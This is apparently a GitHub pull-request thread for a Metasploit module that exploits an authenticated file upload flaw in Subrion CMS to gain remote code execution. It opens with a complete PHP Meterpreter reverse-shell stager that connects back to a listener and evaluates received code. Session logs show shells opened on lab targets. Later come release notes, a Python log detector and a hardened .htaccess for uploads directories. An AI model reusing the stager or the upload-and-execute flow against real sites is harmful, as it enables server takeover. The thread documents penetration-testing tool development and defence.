/*<?php /**/ error_reporting(0); $ip = '192.168.100.1'; $port = 4444; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();
msf6 payload(php/meterpreter/reverse_tcp) > to_handler
[*] Payload Handler Started as Job 0
msf6 payload(php/meterpreter/reverse_tcp) >
[*] Sending stage (39927 bytes) to 192.168.100.146
[*] Meterpreter session 5 opened (192.168.100.1:4444 -> 192.168.100.146:50581) at 2023-08-02 14:44:24 +0200

msf6 payload(php/meterpreter/reverse_tcp) >
msf6 payload(php/meterpreter/reverse_tcp) > sessions -i 5
[*] Starting interaction with 5...

meterpreter > sysinfo
Computer    : WIN112H22
OS          : Windows NT WIN112H22 10.0 build 22621 (Windows 11) AMD64
Meterpreter : php/windows
meterpreter > getuid
Server username:
meterpreter > shell
Process 10328 created.
Channel 0 created.
Microsoft Windows [Version 10.0.22621.1555]
(c) Microsoft Corporation. All rights reserved.

C:\php>ls
[hang]

On the target:

C:\php>php.exe -v
PHP 8.2.9 (cli) (built: Aug  1 2023 12:35:15) (ZTS Visual C++ 2019 x64)
Copyright (c) The PHP Group
Zend Engine v4.2.9, Copyright (c) Zend Technologies

C:\php>php.exe -a
Interactive shell

php > /*<?php /**/ error_reporting(0); $ip = '192.168.100.1'; $port = 4444; if (($f = 'stream_socket_client') && is_call
able($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s
 = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_S
TREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die
('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case
 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = '
'; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket':
 $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (ex
tension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhos
in_bypass(); } else { eval($b); } die();

@ismaildawoodjee
Contributor Author

@cdelafuente-r7 I believe this module should be good to go unless there's something else you'd like me to do. Feel free to review and do additional testing (maybe with proxies, etc.), or merge it whenever it's convenient. Thanks for the reviews and troubleshooting with the XAMPP and Docker installations 💯

@cdelafuente-r7
Contributor

Thanks @ismaildawoodjee! It looks good to me now. I retested everything and it works as expected. I'll go ahead and land it.

Example output

Subrion CMS Version 4.1.0 on Docker

msf6 exploit(multi/http/subrion_cms_file_upload_rce) > run rhosts=127.0.0.1 rport=8080 lhost=192.168.100.1 username=admin password=123456 verbose=true

[*] Started reverse TCP handler on 192.168.100.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking target web server for a response at: http://127.0.0.1:8080/panel/
[+] Target is running Subrion CMS.
[*] Checking Subrion CMS version...
[+] Target is running Subrion CMS Version 4.1.0.
[+] The target appears to be vulnerable. However, this version check does not guarantee that the target is vulnerable, since a fix for the vulnerability can easily be applied by a web admin.
[*] Connecting to Subrion Admin Panel login page to obtain CSRF token...
[+] Successfully obtained CSRF token: 1f0170280dda4388ea7551c37a198bcf
[*] Logging in to Subrion Admin Panel at: http://127.0.0.1:8080/panel/ using credentials admin:123456
[+] Successfully logged in as Administrator.
[*] Preparing payload...
[*] Sending POST data...
[+] Successfully uploaded payload at: http://127.0.0.1:8080/uploads/yigxkmiwvc.phar
[*] Executing 'yigxkmiwvc.phar'... This file will be deleted after execution.
[*] Sending stage (39927 bytes) to 192.168.100.1
[*] Meterpreter session 1 opened (192.168.100.1:4444 -> 192.168.100.1:62542) at 2023-08-03 18:01:36 +0200
[+] Successfully executed payload: http://127.0.0.1:8080/uploads/yigxkmiwvc.phar

meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer    : ea31108cd666
OS          : Linux ea31108cd666 5.10.76-linuxkit #1 SMP Mon Nov 8 10:21:19 UTC 2021 x86_64
Meterpreter : php/linux

Subrion CMS Version 4.2.0 on Windows

msf6 exploit(multi/http/subrion_cms_file_upload_rce) > run rhosts=192.168.100.109 lhost=192.168.100.1 username=admin password=123456 verbose=true targeturi=subrion/

[*] Started reverse TCP handler on 192.168.100.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking target web server for a response at: http://192.168.100.109/subrion/panel/
[+] Target is running Subrion CMS.
[*] Checking Subrion CMS version...
[+] Target is running Subrion CMS Version 4.2.1.
[+] The target appears to be vulnerable. However, this version check does not guarantee that the target is vulnerable, since a fix for the vulnerability can easily be applied by a web admin.
[*] Connecting to Subrion Admin Panel login page to obtain CSRF token...
[+] Successfully obtained CSRF token: EE8xz2t22m5qUpKmrs6DB3G2bKobbw7lQf9KL2C9
[*] Logging in to Subrion Admin Panel at: http://192.168.100.109/subrion/panel/ using credentials admin:123456
[+] Successfully logged in as Administrator.
[*] Preparing payload...
[*] Sending POST data...
[+] Successfully uploaded payload at: http://192.168.100.109/subrion/uploads/lvjvrhcknt.phar
[*] Executing 'lvjvrhcknt.phar'... This file will be deleted after execution.
[*] Sending stage (39927 bytes) to 192.168.100.109
[*] Meterpreter session 2 opened (192.168.100.1:4444 -> 192.168.100.109:49694) at 2023-08-03 18:05:33 +0200
[+] Successfully executed payload: http://192.168.100.109/subrion/uploads/lvjvrhcknt.phar

meterpreter > getuid
Server username: Administrator
meterpreter > sysinfo
Computer    : WIN2019
OS          : Windows NT WIN2019 10.0 build 17763 (Windows Server 2016) AMD64
Meterpreter : php/windows
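
The module output above shows the pattern a web server log records when this vulnerability is used: an admin-panel login followed by a direct request for a freshly uploaded `.phar` file under `/uploads/` (or `/subrion/uploads/` when the site lives under a sub-URI). The following Python is an added example for detecting that pattern in Apache combined-format access logs; it is not part of the Metasploit module or of Subrion CMS, and the log lines it contains are constructed for illustration (the `.phar` names are taken from the output above, the client addresses are made up).

```python
"""Spot requests for PHP-executable files under an uploads directory in Apache
access logs.

Added example; it is not part of the Metasploit module or of Subrion CMS.
The log lines are constructed for illustration (the .phar names are the ones
from the module output above; the client addresses are made up)."""
import re

# Extensions a default Apache/mod_php install treats as PHP.  ".phar" is
# included because that is what the module above uploads.
PHP_EXTENSIONS = frozenset(
    {"php", "phar", "phtml", "php3", "php4", "php5", "php7", "phps"}
)

# Apache "combined" format:  host ident user [time] "METHOD path proto" status bytes ...
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) '
)

# Constructed sample log: login to the panel, then fetches of uploaded files.
SAMPLE_LOG = """\
192.168.100.1 - - [03/Aug/2023:18:01:30 +0200] "POST /panel/ HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.168.100.1 - - [03/Aug/2023:18:01:35 +0200] "GET /uploads/yigxkmiwvc.phar HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.7 - - [03/Aug/2023:18:02:01 +0200] "GET /uploads/photo.jpg HTTP/1.1" 200 34012 "-" "Mozilla/5.0"
192.168.100.1 - - [03/Aug/2023:18:05:31 +0200] "GET /subrion/uploads/lvjvrhcknt.phar?x=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [03/Aug/2023:18:06:00 +0200] "GET /uploads/shell.php.jpg HTTP/1.1" 404 196 "-" "curl/7.88.1"
"""


def executable_php_name(path: str) -> bool:
    """True if any extension in the file name (query string ignored) is a PHP one.

    Every dotted segment after the base name is checked, so 'shell.php.jpg' is
    flagged too: with AddHandler-style configuration Apache can execute such
    double-extension names, and flagging them is the conservative choice."""
    name = path.split("?", 1)[0].rsplit("/", 1)[-1].lower()
    return any(ext in PHP_EXTENSIONS for ext in name.split(".")[1:])


def find_upload_execution(lines, upload_dir="/uploads/"):
    """Return one record per request for a PHP-executable file below upload_dir.

    upload_dir is matched anywhere in the path so that an install under a
    sub-URI (e.g. /subrion/uploads/) is covered as well."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than crash
        path = m.group("path").split("?", 1)[0]
        if upload_dir in path and executable_php_name(path):
            hits.append({
                "host": m.group("host"),
                "time": m.group("time"),
                "method": m.group("method"),
                "path": path,
                "status": int(m.group("status")),
            })
    return hits


def served(hits):
    """Only the hits the server actually answered (status < 400), i.e. the ones
    where the file existed and, absent a blocking .htaccess, was executed."""
    return [h for h in hits if h["status"] < 400]


if __name__ == "__main__":
    for h in find_upload_execution(SAMPLE_LOG.splitlines()):
        print(f'{h["time"]} {h["host"]} {h["method"]} {h["path"]} -> {h["status"]}')
```

Run it against a real log with `find_upload_execution(open("access.log"))`; the 404 entries are still worth keeping, since a failed fetch of a PHP file under the upload directory is a probe even when nothing was executed, while `served()` narrows the list to requests that actually returned content.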

@cdelafuente-r7 cdelafuente-r7 added module docs rn-modules release notes for new or majorly enhanced modules labels Aug 3, 2023
@cdelafuente-r7 cdelafuente-r7 merged commit 4a78360 into rapid7:master Aug 3, 2023
69 checks passed
@cdelafuente-r7
Contributor

Thank you @ismaildawoodjee for your contribution!

@cdelafuente-r7
Contributor

Release Notes

This adds an exploit module that leverages an authenticated file upload vulnerability in Subrion CMS versions 4.2.1 and prior. Due to an issue in the way the .htaccess file is configured by default, it is possible to upload PHP code to the web server and achieve remote code execution.
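
The release notes attribute the issue to the default `.htaccess` in the upload directory. As an added example (not Subrion's shipped `.htaccess` and not part of the module), the following Apache fragment shows what a defensive `.htaccess` for an uploads directory looks like: it refuses to serve any file carrying a PHP-executable extension anywhere in its name, including `.phar`, and switches the PHP engine off for the directory where mod_php is in use. The module names and directives are standard Apache ones; whether the `Require`/`Deny` and `php_flag` directives take effect from `.htaccess` depends on the server's `AllowOverride` setting, which is an assumption about the deployment.

```apache
# Added example of a hardened .htaccess for an uploads directory.
# This is not the .htaccess Subrion ships; it is a defensive configuration
# written for illustration.

# Refuse to serve any file whose name contains a PHP-executable extension,
# also as part of a double extension such as shell.phar.jpg.
<FilesMatch "(?i)\.(php|phar|phtml|php[3-7]|phps)(\.|$)">
    <IfModule mod_authz_core.c>
        # Apache 2.4
        Require all denied
    </IfModule>
    <IfModule !mod_authz_core.c>
        # Apache 2.2 and earlier
        Order deny,allow
        Deny from all
    </IfModule>
</FilesMatch>

# Additionally turn the PHP engine off for this directory when PHP runs as an
# Apache module, so nothing here is interpreted even if a handler is added later.
<IfModule mod_php.c>
    php_flag engine off
</IfModule>
<IfModule mod_php7.c>
    php_flag engine off
</IfModule>
<IfModule mod_php5.c>
    php_flag engine off
</IfModule>
```

The `FilesMatch` block works regardless of whether PHP runs as mod_php or via PHP-FPM, because it denies the request before any handler is chosen; the `php_flag` blocks are a second layer for mod_php only and are wrapped in `IfModule` so that they do not produce a configuration error on a PHP-FPM server.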
